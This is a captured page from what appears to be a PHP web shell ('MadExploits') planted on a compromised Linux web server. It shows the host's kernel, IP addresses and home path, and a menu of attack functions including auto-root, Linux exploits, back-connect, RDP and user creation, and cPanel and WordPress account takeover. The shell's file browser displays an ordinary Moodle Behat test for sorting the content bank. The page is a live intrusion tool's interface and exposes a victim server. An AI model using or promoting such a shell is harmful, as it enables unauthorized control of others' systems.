Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.130.23
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
contentbank /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
access_permissions.feature
1.07
KB
-rw-r--r--
delete_content.feature
3.51
KB
-rw-r--r--
download_content.feature
3.21
KB
-rw-r--r--
edit_content.feature
9.98
KB
-rw-r--r--
events.feature
3.24
KB
-rw-r--r--
search_content.feature
2.7
KB
-rw-r--r--
sort_content.feature
2.95
KB
-rw-r--r--
view_preferences.feature
1.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sort_content.feature
@core @core_contentbank @contentbank_h5p @javascript Feature: Sort content in the content bank In order to temporarily organise the content of the content bank As an admin I need to be able to sort the content bank in various ways Background: Given the following "users" exist: | username | firstname | lastname | email | | manager | Max | Manager | man@example.com | And the following "role assigns" exist: | user | role | contextlevel | reference | | manager | manager | System | | And the following "contentbank content" exist: | contextlevel | reference | contenttype | user | contentname | | System | | contenttype_h5p | admin | Dragon_santjordi.h5p | | System | | contenttype_h5p | admin | mathsbook.h5p | | System | | contenttype_h5p | manager | historybook.h5p | | System | | contenttype_h5p | admin | santjordi.h5p | | System | | contenttype_h5p | admin | santjordi_rose.h5p | | System | | contenttype_h5p | admin | SantJordi_book | Scenario: Admins can order content in the content bank Given I log in as "admin" And I am on site homepage And I turn editing mode on And I add the "Navigation" block if not present And I expand "Site pages" node And I click on "Content bank" "link" When I click on "Display content bank with file details" "button" And I click on "Sort by Content name ascending" "button" And "Dragon_santjordi.h5p" "text" should appear before "historybook.h5p" "text" And "historybook.h5p" "text" should appear before "mathsbook.h5p" "text" And "SantJordi_book" "text" should appear before "santjordi_rose.h5p" "text" And I click on "Sort by Content name descending" "button" And "historybook.h5p" "text" should appear before "Dragon_santjordi.h5p" "text" And "mathsbook.h5p" "text" should appear before "historybook.h5p" "text" Then "santjordi_rose.h5p" "text" should appear before "SantJordi_book" "text" Scenario: Admins can order content depending on the author Given I log in as "admin" And I am on site homepage And I turn editing mode on And I add the "Navigation" block if not present And I expand "Site pages" node And I click on "Content bank" "link" When I click on "Display content bank with file details" "button" Then I click on "Sort by Author ascending" "button" And "Dragon_santjordi.h5p" "text" should appear before "historybook.h5p" "text" And "santjordi_rose.h5p" "text" should appear before "historybook" "text" And I click on "Sort by Author descending" "button" And "historybook.h5p" "text" should appear before "Dragon_santjordi.h5p" "text" And "historybook.h5p" "text" should appear before "santjordi_rose" "text"
Close